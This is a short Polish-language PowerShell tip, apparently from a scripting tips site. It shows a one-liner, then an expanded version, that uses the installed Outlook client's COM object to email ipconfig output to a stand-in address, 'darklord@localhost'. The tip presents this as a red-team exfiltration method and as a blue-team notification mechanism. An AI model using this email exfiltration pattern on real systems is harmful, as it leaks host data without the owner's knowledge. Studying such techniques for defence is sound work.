ipconfig Outlookiem
tty1 · powershell
PS> $m=(New-Object -c Outlook.Application).CreateItem(0);$m.To="darklord@localhost";$m.Subject="ip";$m.Body=(ipconfig|out-string);$m.Send()
#Powershell#RedTeam#Exfil#Admin
Przykład onelinera, który wysyła wynik polecenia ipconfig mailem z wykorzystaniem zainstalowanego i skonfigurowanego Microsoft Outlooka. Dla red teamów jest to ciekawy sposób na eksfiltrację danych, z kolei blue teamy mogą to wykorzystać w swoich skryptach jako mechanizm powiadamiania o różnych wydarzeniach.
Szczegóły
Głównymi bohaterami sa tutaj oczywiście sam Microsoft Outlook oraz cmdlet New-Object, za którego pomocą tworzymy nowy obiekt COM. Żeby całość była bardziej czytelna, moglibyśmy to zapisać tak:
$Outlook = New-Object -ComObject Outlook.Application
$Mail = $Outlook.CreateItem(0)
$Mail.To = "darklord@localhost"
$Mail.Subject = "ip"
$Mail.Body = ipconfig|Out-String
$Mail.Send()